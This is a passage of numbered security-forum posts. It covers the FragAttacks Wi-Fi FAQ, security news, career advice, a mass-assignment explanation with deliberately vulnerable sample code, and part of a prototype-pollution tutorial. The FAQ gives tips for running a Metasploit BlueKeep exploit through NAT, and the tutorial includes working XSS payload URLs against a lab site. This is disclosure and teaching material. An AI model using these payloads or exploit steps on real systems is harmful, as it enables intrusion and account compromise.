prevents an adversary from exploiting these insecure internet-of-things devices is the security of your Wi-Fi network. It therefore remains essential to have strong encryption and authentication at the Wi-Fi layer. At work, the security of Wi-Fi is also essential for the same reasons as mentioned above. Additionally, many companies will automatically allow access to sensitive services when a user (or adversary) is able to connect to the Wi-Fi network. Therefore strong Wi-Fi security is also essential in a work setting. Will using a VPN prevent attacks? Using a VPN can prevent attacks where an adversary is trying to exfiltrate data. It will not prevent an adversary from bypassing your router's NAT/firewall to directly attack devices. How did you discover this? The seeds of this research were already planted while I was investigating the KRACK attack. At that time, on 8 June 2017 to be precise, I wrote down some notes to further investigate (de)fragmentation support in Linux. In particular, I thought there might be an implementation vulnerability in Linux. 
However, a single unconfirmed implementation flaw isn't too spectacular research-wise, so after disclosing the KRACK attack I decided to work on other research instead. The idea of inspecting (de)fragmentation in Wi-Fi, and determining whether there really was a vulnerability or not, was always at the back of my mind though. Fast-forward three years later, and after gaining some additional ideas to investigate, closer inspection confirmed some of my hunches and also revealed that these issues were more widespread than I initially assumed. And with some extra insights I also discovered all the other vulnerabilities. Interestingly, this also shows the advantage of fleshing out ideas before rushing to publish (though actually finishing the paper before submission was still a race against time...).

How sure are you that all Wi-Fi devices are affected?
In experiments on more than 75 devices, all of them were vulnerable to one or more of the discovered attacks. I'm curious myself whether all devices in the whole world are indeed affected though! To find this out, if you find a device that isn't affected by at least one of the discovered vulnerabilities, let me know. Also, if your company provides Wi-Fi devices and you think that your product was not affected by any of the discovered vulnerabilities, you can send your product to me. Once I have confirmed that it indeed was not affected by any vulnerabilities, the name of your product and company will be put here! Note that I do need a method to assure that I'm indeed testing a version of the product that was available before the disclosure of the vulnerabilities (and that you didn't silently patch some vulnerabilities).

Does this mean every Wi-Fi device is trivial to attack?
The design issues are, on their own, tedious to exploit in practice. Unfortunately, some of the implementation vulnerabilities are common and trivial to exploit. Additionally, by combining the design issues with certain implementation issues, the resulting attacks become more serious. This means the impact of our findings depends on the specific target. Your vendor can inform you what the precise impact is for specific devices. In other words, for some devices the impact is minor, while for others it's disastrous.

How many networks use fragmentation?
By default devices don't send fragmented frames. This means that the mixed key attack and the fragment cache attack, on their own, will be hard to exploit in practice, unless Wi-Fi 6 is used. When using Wi-Fi 6, which is based on the 802.11ax standard, a device may dynamically fragment frames to fill up available airtime.

How many networks periodically refresh the pairwise session key?
By default access points don't renew the pairwise session key, even though some may periodically renew the group key. This means that the default mixed key attack as described in the paper is only possible against networks that deviate from this default setting.

Isn't it irresponsible to release tools to perform the attacks?
The test tool that we released can only be used to test whether a device is vulnerable. It cannot be used to perform attacks: an adversary would have to write their own tools for that. This approach enables network administrators to test if devices are affected while reducing the chance of someone abusing the released code.

Where are all the attack tools?
The code that has currently been released focuses on detecting vulnerable implementations.
The proof-of-concept scripts that perform actual attacks are not released, to provide everyone with more time to implement and deploy patches. Once a large enough fraction of devices has been patched, and if deemed necessary and/or beneficial, the attack scripts will be publicly released as well.

Do you have example network captures of the vulnerabilities?
There are example network captures of the test tool that illustrate the root causes of several vulnerabilities.

How long will you maintain the driver patches needed to run the test scripts?
The modifications to certain drivers have been submitted upstream to Linux, meaning they will be maintained by the Linux developers themselves. The patches to the Intel driver have not been submitted upstream because they're a bit hacky. Concretely, this means that drivers such as ath9k_htc will be supported out of the box, while for Intel devices you will have to use patched drivers, and I'm not sure how much time I'll have to maintain those.

Why are so many implementations vulnerable to the non-consecutive PN attack?
That's a good question. I'm not sure why so many developers missed this. This widespread implementation vulnerability does highlight that leaving important cryptographic operations up to developers is not ideal. Put another way, it might have been better if the standard required an authenticity check over the reassembled frame instead. That would also better follow the principle of authenticated encryption.

Why are so many implementations vulnerable to the mixed plaintext/encrypted fragment attack?
The 802.11 standard states in section 10.6: "If security encapsulation has been applied to the fragment, it shall be deencapsulated and decrypted before the fragment is used for defragmentation of the MSDU or MMPDU". There is unfortunately no warning that unencrypted fragments should be dropped. And there are no recommended checks that should be performed when reassembling two (decrypted) fragments.

Can an implementation be vulnerable to a cache attack without being vulnerable to a mixed key attack?
Yes, although this is unlikely to occur in practice. More technically, let's assume that an implementation tries to prevent mixed key attacks by: (1) assigning a unique key ID to every fragment; (2) incrementing this key ID whenever the pairwise transient key (PTK) is updated; and (3) assuring all fragments were decrypted under the same key ID. Unfortunately, in that case cache attacks may still be feasible. In particular, if under this defense key IDs are reused after (re)connecting to a network, for example because they are reset to zero, fragments that are decrypted using a different key may still be assigned the same key ID. As a result, cache attacks remain possible, because the fragments will still be reassembled as they have the same key ID.

Can the mixed-key attack be prevented in a backward-compatible manner?
Strictly speaking not, because the 802.11 standard does not explicitly require that a sender encrypts all fragments of a specific frame under the same key. Fortunately, all implementations that we tested did encrypt all fragments using the same key, at least under the normal circumstances that we tested, meaning in practice the mixed key attack can be prevented without introducing incompatibilities.

Is the old WPA-TKIP protocol also affected by the design flaws?
Strictly speaking not, though implementations can still be vulnerable. Note that TKIP should not be used because it is affected by other more serious security flaws.
Additionally, TKIP has been deprecated by the Wi-Fi Alliance. The TKIP protocol is not affected by the fragmentation-based design flaws (CVE-2020-24587 and CVE-2020-24586) because it verifies the authenticity of the full reassembled frame. This is in contrast to CCMP and GCMP, which only verify the authenticity of individual fragments, and rely on sequential packet numbers to securely reassemble the individual (decrypted) fragments. Additionally, TKIP is not affected by the aggregation design flaw (CVE-2020-24588) because a receiver is supposed to drop A-MSDUs that are encrypted using TKIP. Indeed, in Section "12.9.2.8 Per-MSDU/Per-A-MSDU Rx pseudocode" of the 802.11-2016 standard it's specified that when using TKIP only normal MSDU frames are accepted. Unfortunately, some implementations don't verify the authenticity of fragmented TKIP frames, and some accept aggregated frames (i.e. A-MSDUs) even when encrypted using TKIP. This unfortunately means that in practice TKIP implementations may still be vulnerable.

Is the ancient WEP protocol also affected by the design flaws?
Yes. The WEP protocol is so horrible that it doesn't even try to verify the authenticity of fragmented frames. This means an adversary can trivially perform fragmentation-based attacks against WEP. Similar to TKIP, the WEP protocol is not affected by the aggregation design flaw (CVE-2020-24588) because a receiver is supposed to drop A-MSDUs that are encrypted using WEP. Nevertheless, in practice several WEP implementations do accept A-MSDUs and therefore are still vulnerable. Finally, in case you've been living under a rock, stop using WEP, it's known to be a horrible security protocol.

Can fragmentation attacks be prevented by disallowing small delays between fragments?
This would make exploiting possible vulnerabilities harder and perhaps in some cases practically infeasible. Unfortunately this doesn't provide any guarantees though. I therefore recommend fixing the root cause instead.

Are patches for Linux available?
Yes! During the embargo I helped write some patches for the Linux kernel. This means an updated Linux kernel should (soon) be available for actively supported Linux distributions.

Did others also discover the plaintext injection issue (CVE-2020-26140)?
During the embargo I was made aware that Synopsys also discovered the plaintext injection vulnerability (CVE-2020-26140) in access points. They found that Mediatek, Realtek, and Qualcomm were affected, and to cover these three implementations the identifiers CVE-2019-18989, CVE-2019-18990, and CVE-2019-18991 were respectively assigned. During the FragAttacks research I found that the same vulnerability was (still) present in other access points and that clients can be vulnerable to a similar attack. Additionally, and somewhat surprisingly, I also found that some devices reject normal (non-fragmented) plaintext frames but do accept fragmented plaintext frames (CVE-2020-26143).

Why do you use the same CVE for implementation issues in multiple different codebases?
Implementation-specific vulnerabilities usually get their own independent CVE identifier for each different codebase. However, because the same implementation issues seem to be present across multiple vendors, it would make more sense to have a single CVE identifier for each common implementation issue. After all, the main purpose of CVE identifiers is to provide a single, common ID to be used across vendors to identify the same vulnerability.
We therefore think it makes sense to assign only a single CVE identifier to each implementation issue. This enables vendors and customers to easily reference an implementation vulnerability and, for instance, check whether certain products are affected by one of the discovered vulnerabilities.

Why was the embargo so long?
The disclosure was delayed by two months in consensus with ICASI and the Wi-Fi Alliance. The decision on whether to disclose fast, or to provide more time to write and create patches, wasn't easy. At the time, the risk of leaks appeared low, and the advantage of delaying appeared high. Additionally, we were prepared to immediately disclose in case details would accidentally leak publicly. Another aspect that influenced my decision was the current situation, meaning COVID-19, which among other things made it harder to safely get access to physical places/labs to test patches.

How did you monitor for leaks during the embargo?
During the last two months of the embargo, we were prepared to make the research public whenever information seemed to be leaking. To detect leaks I personally searched for relevant keywords (CVE numbers, paper title, script names) on Google and social media such as Twitter. The Wi-Fi Alliance and ICASI were also monitoring for leaks (e.g. if questions came from people that shouldn't have known about it). This can detect innocent leaks. Detecting malicious leaks or usage of the vulnerabilities in stealthy attacks is a much harder problem (if even possible at all). If you know about cases where some information was (accidentally) leaked, it would be useful to know about that so that I can better estimate the impact of having long embargoes. Any information you provide about this will remain confidential. This information will help me in future decisions when weighing the option of a longer embargo versus disclosing research even when several vendors don't have patches ready (i.e. it won't be used to point fingers).

Are these vulnerabilities being exploited in practice?
Not that we are aware of. Because some of the design flaws took so long to discover, my hunch is that they have not been previously exploited in the wild. But it is difficult to monitor whether one of the discovered vulnerabilities has been exploited in the past or is currently being exploited. So it is hard to give a definite answer to this question.

Why did Microsoft already fix certain vulnerabilities on March 9, 2021?
The original disclosure date was March 9, 2021. Roughly one week beforehand it was decided to delay the disclosure. At this time Microsoft had already committed to shipping certain patches on March 9. I agreed that already releasing certain patches without providing information about the vulnerabilities was, at that point, an acceptable risk. Put differently, the advantages of delaying the disclosure appeared to outweigh the risk that someone would reverse engineer the patches and rediscover certain attacks.

Is the "Treating fragments as full frames" flaw (CVE-2020-26142) also applicable to APs?
Yes, access points can also be vulnerable. In particular, during additional experiments that I recently performed, the vulnerability was also present in OpenBSD when it acted as an access point.

Can APs be vulnerable to attacks that send broadcast frames?
Yes, although they are less likely to be vulnerable compared to clients. This is because under normal circumstances clients never send a frame to the AP with a broadcast receiver address.
Instead, clients first send broadcast/multicast network packets as unicast Wi-Fi frames to the AP, and the AP then broadcasts these packets to all connected clients. As a result, many APs will simply ignore Wi-Fi frames with a broadcast receiver address, because in normal networks those frames are only meant for clients.

Why are some of the tested devices so old?
I also tested some very old Wi-Fi devices and dongles to estimate how long the discovered vulnerabilities have been present in the wild. Note that some old devices may remain in use for a long time, for example, expensive medical or industrial equipment that is rarely replaced.

How did you make macOS switch to the malicious DNS server in the demonstration?
After injecting the ICMPv6 Router Advertisement with the malicious DNS server, macOS won't immediately use this DNS server. This is because macOS will only switch to the malicious DNS server if its current (primary) DNS server is no longer responding. To force this to happen, we briefly block all traffic towards the victim. This causes macOS to switch to the malicious DNS server.

Isn't nyu.edu using HSTS to prevent these kinds of attacks?
Websites can use HSTS to force browsers to always use HTTPS encryption when visiting a website. This prevents the attack that was shown in our demo. Unfortunately, the website of NYU at the time did not properly configure HSTS. More technically, some subdomains such as globalhome.nyu.edu do instruct the browser to use HSTS by including the following header in responses:
strict-transport-security: max-age=31536000 ; includeSubDomains
Unfortunately, other subdomains such as shibboleth.nyu.edu remove HSTS by including the following header in responses:
Strict-Transport-Security: max-age=0
Combined with other configuration decisions, this meant that when a user would type nyu.edu in their browser, the initial request was sent in plaintext and therefore could be intercepted by an adversary. Note that NYU has been informed of this issue and is investigating it.

How do I reproduce the BlueKeep attack shown in the demonstration?
First, when using the NAT punching technique, it is essential that you manually configure the CPORT parameter so that metasploit uses the correct client port. You can learn this port from the injected TCP SYN packet that arrives at the server. When using a different client port the router/NAT will not recognize the connection and will not forward it to the victim machine. Second, you must set the AutoCheck parameter to zero. Otherwise metasploit will try to initiate multiple connections with the victim and that is problematic when manually specifying a client port through CPORT. This workaround of setting AutoCheck to zero can be avoided by punching multiple holes in the router/NAT and modifying metasploit to use a different CPORT for each connection that will be initiated.

Sursa: https://www.fragattacks.com/
7. Fans https://www.facebook.com/photo?fbid=774009882962436&set=pb.100010602939412.-2207520000..
8. Hi, the first recommendation is to know the language well: data types, classes, etc. The second recommendation is to understand what the Java language offers you, the classes you can import and use. After that, you need to move on to frameworks. The language itself isn't limited, but you won't be rewriting what thousands of other people have already built. If it's about web applications I recommend Spring; I know it's very common and in high demand. There are others too, but it depends from case to case. Get familiar with Maven and look at everything you can use for any purpose: Jackson or whatever else, depending on what you want to build.
9. A New PHP Composer Bug Could Enable Widespread Supply-Chain Attacks April 29, 2021 Ravie Lakshmanan The maintainers of Composer, a package manager for PHP, have shipped an update to address a critical vulnerability that could have allowed an attacker to execute arbitrary commands and "backdoor every PHP package," resulting in a supply-chain attack. Tracked as CVE-2021-29472, the security issue was discovered and reported on April 22 by researchers from SonarSource, following which a hotfix was deployed less than 12 hours later. "Fixed command injection vulnerability in HgDriver/HgDownloader and hardened other VCS drivers and downloaders," Composer said in its release notes for versions 2.0.13 and 1.10.22 published on Wednesday. "To the best of our knowledge the vulnerability has not been exploited." Composer is billed as a tool for dependency management in PHP, enabling easy installation of packages relevant to a project. It also allows users to install PHP applications that are available on Packagist, a repository that aggregates all public PHP packages installable with Composer. According to SonarSource, the vulnerability stems from the way package source download URLs are handled, potentially leading to a scenario where an adversary could trigger remote command injection. As proof of this behavior, the researchers exploited the argument injection flaw to craft a malicious Mercurial repository URL that takes advantage of its "alias" option to execute a shell command of the attacker's choice. "A vulnerability in such a central component, serving more than 100 million package metadata requests per month, has a huge impact as this access could have been used to steal maintainers' credentials or to redirect package downloads to third-party servers delivering backdoored dependencies," SonarSource said. The Geneva-based code security firm said one of the bugs was introduced in November 2011, suggesting that the vulnerable code lurked right from the time development on Composer started 10 years ago. The first "alpha" version of Composer was released on July 3, 2013. "The impact to Composer users directly is limited as the composer.json file is typically under their own control and source download URLs can only be supplied by third party Composer repositories they explicitly trust to download and execute source code from, e.g. Composer plugins," Jordi Boggiano, one of the primary developers behind Composer, said. Sursa: https://thehackernews.com/2021/04/a-new-php-composer-bug-could-enable.html
10. Great, I didn't know this: "The Pwned Passwords feature searches previous data breaches for the presence of a user-provided password. The password is hashed client-side with the SHA-1 algorithm then only the first 5 characters of the hash are sent to HIBP per the Cloudflare k-anonymity implementation. HIBP never receives the original password nor enough information to discover what the original password was."
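A minimal sketch of that k-anonymity range query, assuming OpenSSL is available for SHA-1 (the HTTP request itself is only indicated in a comment, and the password is just an example):

#include <openssl/sha.h>
#include <cstdio>
#include <cstring>
#include <string>

int main()
{
    const char* password = "hunter2";                 // example password

    unsigned char digest[SHA_DIGEST_LENGTH];
    SHA1(reinterpret_cast<const unsigned char*>(password), strlen(password), digest);

    // Hex-encode the 20-byte digest (uppercase, as used by the HIBP API).
    char hex[SHA_DIGEST_LENGTH * 2 + 1];
    for (int i = 0; i < SHA_DIGEST_LENGTH; ++i)
        sprintf(&hex[i * 2], "%02X", digest[i]);

    std::string prefix(hex, 5);   // only these 5 characters ever leave the client
    std::string suffix(hex + 5);  // compared locally against the API response

    // GET https://api.pwnedpasswords.com/range/<prefix> returns all suffixes
    // sharing that prefix; the client checks for `suffix` locally.
    printf("prefix sent to HIBP: %s\nsuffix kept locally: %s\n",
           prefix.c_str(), suffix.c_str());
    return 0;
}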
11. I don't want this to sound like a "peasant" solution, but I still use it sometimes: "get string between two other strings": https://stackoverflow.com/questions/3368969/find-string-between-two-substrings Something like get_string_between(xml, "<tag>", "</tag>") And you use it however you want; you can add some for/while loops when there are multiple occurrences...
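For reference, a tiny C++ version of that helper (the function name is just illustrative):

#include <iostream>
#include <string>

// Returns the substring of `s` found between `start` and `stop`, or "" if not found.
std::string get_string_between(const std::string& s,
                               const std::string& start,
                               const std::string& stop)
{
    size_t b = s.find(start);
    if (b == std::string::npos) return "";
    b += start.size();
    size_t e = s.find(stop, b);
    if (e == std::string::npos) return "";
    return s.substr(b, e - b);
}

int main()
{
    std::string xml = "<root><tag>value</tag></root>";
    std::cout << get_string_between(xml, "<tag>", "</tag>") << "\n";  // prints: value
    return 0;
}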
12. Those earnings are "lifetime". "Besides the eight hackers passing the $1 million earnings milestone, twelve more hit $500,000 in lifetime earnings and 146 earned $100,000, up from 50 last year." We don't know exactly when they started. Leaving aside the $1 million cases, if we take the others and assume they have been doing this for 5 years, then yes, that means $100,000+ per year. And there are only 12 of them. The chances of making that much money today are small, for the simple reason that you are not the only one doing this. If you dedicate at least 8 hours a day to it you could get there, but bug bounty also has a downside: the lack of financial stability. It's hard in practice. I do recommend it, though, alongside a stable job.
13. Yes, stay and keep working on what you already do, and learn new things in your free time. CompTIA Security+ is just an idea; it covers some decent, general topics. You can also learn some web programming so you understand web vulnerabilities properly. For that I recommend reading The Web Application Hacker's Handbook (2nd edition); it's very good for a start. It depends on how fast you learn; it can take anywhere from 2-3 months to a few years.
14. Hi, broadly I see security as having two sides: - defensive - monitoring, incident response and that kind of work - offensive - penetration testing, red teaming. The second one is of course more "fun" to me, but I think there are more jobs on the first. I also think that for offensive work you need more skills: you have to know both the defensive and the offensive side, for example so you can bypass various security mechanisms. As for certifications, it depends on which branch you want to follow. For example, CompTIA Security+ is a good start for both because it lays a reasonably solid foundation. Then, if you like the offensive side, you first need to know a bit of web programming. After that, skip CEH, it is utter garbage; go for OSCP instead, although it is not exactly easy for "new" people. I don't know how things are with remote positions, but there are still chances, given that the pandemic is still ongoing. My suggestion is to look for such positions, and if you don't find any, move to a bigger city. Cluj is a beautiful city; even though it has become more crowded and more expensive, I still say it is worth it. You can find plenty of documentation on anything, including here on the forum. Take a look through the English Tutorials and Web Security categories. Then again, the problem is that every company has its own requirements. If you like a company, I recommend spending a few days before the interview learning roughly what they need. Even if they don't accept you, that knowledge stays with you and will be useful later on. @tagheuer - It may be possible, but it is difficult and involves a lot of work. One option would be bug bounty, but you have to do it at a professional level, get into private programs and dedicate a lot of time to it. On top of some solid skills. Otherwise, I have no idea how it could work as a freelancer, because I don't think companies throw tens of thousands of euros at some random guy when they can go to a firm instead.
  15. Computer security world in mourning over death of Dan Kaminsky, aged 42 DEF CON hails 'an icon in all the positive ways' Iain Thomson in San Francisco Sun 25 Apr 2021 // 04:10 UTC OBIT Celebrated information security researcher Dan Kaminsky, known not just for his technical ability but also for his compassion and support for those in his industry, has died. He was 42. Though Kaminsky rose to fame in 2008 for identifying a critical design weakness in the internet's infrastructure – and worked in secret with software developers to mitigate the issue before it could be easily exploited – he had worked behind the scenes in the infosec world for at least the past two decades. Dan Kaminsky ... Credit: Dave Bullock / eecue Not that Dan was the celebrity type. When he disclosed the DNS poisoning flaw at that year's Black Hat conference, he looked distinctly uncomfortable in a suit – the first time many had seen him wear one – though when it came to explaining the vulnerability and its solution, he was unparalleled. When your humble Register hack asked him why he hadn't gone to the dark side and used the flaw to become immensely wealthy – either by exploiting it to hijack millions of netizens' web traffic, or by selling details of it to the highest bidders – he said not only would that have been morally wrong, he didn't want his mom to have to visit him in prison. You can read more technical info on the DNS flaw here. Besides discovering the domain-name system weakness, he had been a stalwart of the security research scene for years, and was a much-loved regular at conferences big and small. You can find a YouTube playlist of his DEF CON presentations, for instance, here. He would talk with and advise anyone – even paying the entrance fees for some researchers or letting them crash in his hotel room floor – and it was this generosity that people are overwhelmingly remembering this weekend. It's hard to meet a person in the computer security field for whom everyone has a good word, and Kaminsky was one of them. He also came up with some top-notch research besides the DNS poisoning issue. For example, in 2005, Sony BMG decided to install rootkits on people's PCs without telling them to counter CD music piracy. Company president Thomas Hesse argued that "most people, I think, don't even know what a rootkit is, so why should they care about it?" After the issue was identified by Mark Russinovich, now CTO of Microsoft Azure, Kaminsky helped in identifying just how many folks likely had the anti-piracy mechanism on their systems – in short, some 570,000 networks had computers touched by Sony BMG's code. He also did sterling work in spotting flaws in SSL, and in automating the detection of Conficker malware infections. Outside of these high-profile discoveries, Kaminsky was beloved by so many because he had a sense of fun and clearly enjoyed collaborating with others. His conference talks at Black Hat, DEF CON, and smaller cons were often overbooked and standing-room only at the back. He had an unerring knack for finding elegant or interesting ways of probing code, explaining the ramifications to an audience, and then answering as many questions as he could. As a journalist, this was a blessing for your vulture – Kaminsky had no animosity to the press if they were trying to get the full story out, and would explain stuff quickly and simply to make sure coverage was accurate. 
This hack remembers cancelling dinner plans when he called late one afternoon with an interesting story: you knew it was going to be a late night though it would be worth it. There is now a move to see Kaminsky inducted into the Internet Hall of Fame. It is an accolade he thoroughly deserves. His cause of death has not been publicly disclosed. ® Sursa: https://www.theregister.com/2021/04/25/dan_kaminsky_obituary/
16. Turkish authorities on Friday issued arrest warrants for 78 people over their alleged ties to a cryptocurrency trading platform whose founder fled the country with nearly two billion dollars of investors' assets, the Anadolu news agency reported on Friday, cited by AFP. Turkish police arrested around 62 suspects in eight cities, including Istanbul, where the Thodex platform is headquartered, while another 16 suspects are still being sought. Thodex suspended trading after posting a message on Wednesday saying it needed five days to handle an unspecified outside investment. According to the Turkish press, Thodex halted its operations at a time when it held assets worth at least two billion dollars belonging to 391,000 investors, and those assets have become impossible to recover. In a statement issued from an undisclosed location, Thodex CEO Faruk Fatih Ozer promised to reimburse investors and to return to Turkey to face justice, after the government froze the company's accounts and police raided its headquarters in Istanbul. Turkish officials released a photo of Faruk Fatih Ozer passing through security checks at the Istanbul airport on his way to an undisclosed destination; according to some sources, Ozer is in Albania. The investors' lawyer, Oguz Evren Kilic, said hundreds of thousands of investors have been unable to access their digital wallets. "We have started legal proceedings and filed a complaint with the prosecutor's office," the lawyer said. The prosecutor's office, for its part, said it has opened an investigation into the businessman for "aggravated fraud and founding a criminal organization". A large number of Turkish citizens have turned to cryptocurrencies in an attempt to protect their savings amid the falling value of the Turkish lira and high inflation. In March, inflation in Turkey stood at 16.2%, more than three times the central bank's 5% target. Meanwhile, the Turkish lira has depreciated by 10% against the dollar this year, continuing a trend that began eight years ago. AGERPRES (author: Constantin Balaban, editor: Andreea Marinescu, online editor: Adrian Dadarlat) Sursa: https://www.agerpres.ro/economic-extern/2021/04/23/zeci-de-persoane-au-fost-arestate-in-turcia-dupa-colapsul-unei-platforme-de-tranzactionare-a-criptomonedelor--702274
17. Right, the idea with the Admin was Mass Assignment. Example: https://ropesec.com/articles/mass-assignment/ (but there are many others). Mass Assignment is, unfortunately, a lesser-known vulnerability, but it is quite dangerous and, above all, quite common. In practice, to make things easier, developers "bind" whatever comes from the frontend to an object on the backend (e.g. User). The server-side object often contains more properties than necessary and ignores them if they are NULL, but if they are not, it can set them through a query that takes, wholesale, all the properties coming from the frontend. This is quite easy to do and saves a lot of the manual work of handling each field separately, especially when the fields keep changing. On top of that, it is a vulnerability I have run into in practice several times. Others have run into it often as well. And it is pretty ugly. In practice it is sometimes even simpler: you may see more properties of that object somewhere (e.g. on GET /user) while PATCH/PUT /user exposes only firstname, for example. I thought about doing it that way, but it would have been too easy. If isadmin=0 had been sitting right there in the request, the challenge would have taken 30 seconds. The explicit purpose of this exercise was to showcase this vulnerability. I hope that makes sense. I am glad to see comments like this. There can also be similar discussions about the other exercises (e.g. the Server or the Network ones), but I assure you they had a purpose too and that they are practical problems that happen in real life.
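A minimal sketch of the mass-assignment pattern described above, in Express. The routes, field names and in-memory store are made up for illustration; this is not the challenge's actual code:

const express = require('express');
const app = express();
app.use(express.json());

// Tiny in-memory "database" just to keep the sketch self-contained.
const users = { 1: { firstname: 'Ion', email: 'ion@example.com', isadmin: 0 } };

// Vulnerable pattern: everything in the request body is copied straight onto
// the stored user, including fields the client must never control.
// PATCH /user/1 with {"firstname":"x","isadmin":1} silently grants admin.
app.patch('/user/:id', (req, res) => {
  const user = users[req.params.id];
  Object.assign(user, req.body);
  res.json(user);
});

// Safer pattern: bind only an explicit allow-list of fields.
const EDITABLE = ['firstname', 'email'];
app.put('/user/:id', (req, res) => {
  const user = users[req.params.id];
  for (const f of EDITABLE) if (f in req.body) user[f] = req.body[f];
  res.json(user);
});

app.listen(3000);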
18. I have sent an email to the winners of the best write-ups. If you sent me write-ups and did not receive an email, please let me know. I am still waiting for emails from 2 CTF winners (top 10 places) so I can hand out the prizes.
19. JavaScript prototype pollution: practice of finding and exploitation Nikita Stupin Apr 15 · 16 min read If you follow the reports of researchers who participate in bug bounty programs, you probably know about the category of JavaScript prototype pollution vulnerabilities. And if you don't follow them and are seeing this phrase for the first time, then I suggest you close this gap, because this vulnerability can lead to a complete compromise of both the server and the client. Chances are that at least one of the products you use or develop runs on JavaScript: the client part of a web application, a desktop app (Electron), a server (NodeJS) or a mobile application. This article will help you dive into the topic of prototype pollution. In the sections JavaScript features and What is prototype pollution? you will learn how JavaScript objects and prototypes work and how the specifics of their behaviour can lead to vulnerabilities. In the sections Client-side prototype pollution and Server-side prototype pollution you will learn how to search for and exploit this vulnerability in real-world cases. Finally, you will learn how to protect your applications and why the most common method of protection can be easily circumvented. Before proceeding to the next sections, I suggest that you open the developer tools and try the examples yourself as you read, in order to gain some practical experience and a deeper understanding of the material. JavaScript features The prototype pollution vulnerability is unique to the JavaScript language. Therefore, before dealing with the vulnerability itself, we need to understand the features of JavaScript that lead to it. Object How do objects work in JavaScript? Open the developer tools and create a simple object containing two properties. We can access the properties of an object in two main ways. What happens if we try to access a nonexistent property? We get the value undefined, which means the property is missing. So far so good. In JavaScript, functions can be treated like normal variables (for more information, refer to the first-class functions article), so object methods are simply properties whose values are functions. Add the foo() method to the o object and call it. Now let's call the toString() method. Suddenly, the toString() method is executed, even though the o object doesn't have a toString() method! We can check this using the Object.getOwnPropertyNames() function. Indeed, there are only three own properties: name, surname, and foo. Where did the toString() method come from? Object prototype JavaScript is minimalistic in terms of the number of entities. Almost every entity is an object, including arrays, functions, and even class definitions! Let's dwell on classes for a moment. In JavaScript, there are no classes in the sense most programmers understand them. If you have not previously encountered classes in JavaScript but have experience using classes in other languages, then the first thing I suggest is to forget everything you know about classes. So, imagine that you have two entities: an object and a primitive (number, string, null, etc.). How can you use them to implement such a convenient class feature as inheritance? You can select a special property that each object will have. It will contain a reference to the parent. Let's call this property [[Prototype]]. Okay, what if we don't want to inherit all the properties and methods from the parent?
Let's select a special property on the parent from which the properties and methods will be inherited, and call it prototype! There are several ways to find out the prototype of an object, for example by using the Object.getPrototypeOf() method. What we get back is nothing other than Object.prototype, which is the prototype of almost all objects in JavaScript. Making sure that this is Object.prototype is easy enough. When you access an object property via o.name or o['name'], the following actually happens: The JavaScript engine searches for the name property in the o object. If the property is present, it is returned. Otherwise, the prototype of the o object is taken and the property is searched for in it! So it turns out that the toString() method is actually defined in Object.prototype, but since an object's prototype is implicitly set to Object.prototype when the object is created, we can call the toString() method on almost anything. The parent, in turn, can also have a prototype, and the parent of the parent too, and so on. Such a sequence of prototypes, from an object down to null, is called a prototype chain. A small remark in this regard: when accessing a property, the property is searched for along the entire prototype chain. In the case of the object o, the prototype chain is relatively short, with only one prototype. The same cannot be said about the window object. By the way, the word "prototype" in JavaScript can refer to at least three different things, depending on the context: The internal property [[Prototype]]. It is called internal because it lives in the "guts" of the JavaScript engine; we only get access to it through special accessors such as __proto__, Object.getPrototypeOf(), and others. The prototype property: Object.prototype, Function.prototype, and others. The __proto__ property. A rare and not quite correct usage, because technically __proto__ is a getter/setter that merely reads or writes a reference to the object's prototype. What is prototype pollution? The term prototype pollution refers to the situation in which the prototype of fundamental objects is changed. After executing this code, almost any object will have an age property with the value 42. There are two exceptions: If the age property is defined on the object itself, it overrides the same property of the prototype. If the object does not inherit from Object.prototype. What can prototype pollution look like in code? Consider the program pp.js. If an attacker controls the parameters a and v, they can set a to '__proto__' and v to an arbitrary string value, thus adding the test property to Object.prototype. Congratulations, we just found prototype pollution! "But who in their right mind would use such constructions?" you may ask. Indeed, this example is rarely found in real life. However, there are seemingly harmless constructs that, under certain circumstances, allow us to add or change properties of Object.prototype. Specific examples will be discussed in the following sections. Client-side prototype pollution Client-side prototype pollution began to be actively explored in mid-2020. At the moment, the best-researched vector is the one where the payload arrives in the request parameters (after ?) or in the fragment (after #). This vulnerability is most often escalated to Reflected XSS. It is quite possible that the payload can be not only passed in the request parameters or fragment, but also saved on the server.
Thus, the payload would fire every time, for every user who visits a certain page, regardless of whether they followed a malicious link. Finding prototype pollution Let's try to find prototype pollution on the vulnerable site https://ctf.nikitastupin.com/pp/known.html. The easiest way to do this is to install the PPScan extension for Google Chrome and visit the vulnerable page. We can see that the counter on the extension now shows two, which means that at least one of the payloads worked. If we click on the extension icon, we will see the payloads demonstrating the presence of the vulnerability. PPScan extension in action Let's try one of the payloads by hand: click on the link https://ctf.nikitastupin.com/pp/known.html?__proto__[polluted]=test, open the developer tools and check the result. Great, the payload worked! Unfortunately, client-side prototype pollution by itself does not pose a serious danger. At best you can use it to cause a client-side DoS, which is cured by refreshing the page. Impact and gadgets On the client side, escalation to XSS is the most interesting. The JavaScript code that can be used to escalate prototype pollution into another vulnerability is called a gadget. Generally we either have a well-known gadget, or we have to search for gadgets on our own. Searching for new gadgets takes quite a lot of time. Using existing gadgets First of all, it makes sense to check the existing gadgets in the BlackFan/client-side-prototype-pollution repository or in the Cross-site scripting (XSS) cheat sheet. There are at least two ways to check for known gadgets: Using the Wappalyzer plugin. Using the fingerprint.js script. Let's use the second method, but first let's understand how it works. Usually a gadget's library defines specific variables in the global context, and their presence tells you that the gadget is there. For example, if you use Twitter Ads, you will probably use the Twitter Universal Website Tag, which defines the twq variable. The fingerprint.js script mostly checks for such specific variables in the global context. I borrowed the gadgets and their corresponding variables from BlackFan/client-side-prototype-pollution. Copy the script and execute it in the context of the vulnerable page. fingerprint.js shows that the page has a Twitter Universal Website Tag gadget It looks like the page has a Twitter Universal Website Tag gadget. We find a description of the gadget in BlackFan/client-side-prototype-pollution; we are mostly interested in the PoC section with a ready-made payload. Trying the payload on the vulnerable site: https://ctf.nikitastupin.com/pp/known.html?__proto__[hif][]=javascript:alert(document.domain). Successful exploitation of prototype pollution with the help of a well-known gadget After a couple of seconds, the coveted alert() appears, great! Finding new gadgets What should we do when there are no known gadgets? Let's go to https://ctf.nikitastupin.com/pp/unknown.html and make sure it's vulnerable to prototype pollution: https://ctf.nikitastupin.com/pp/unknown.html?__proto__[polluted]=31337. However, this time fingerprint.js didn't find any gadgets. fingerprint.js didn't find the gadgets Although Wappalyzer reports the presence of jQuery, this is a false positive caused by the jquery-deparam library that is used on the site https://ctf.nikitastupin.com/pp/unknown.html. False positive response from the 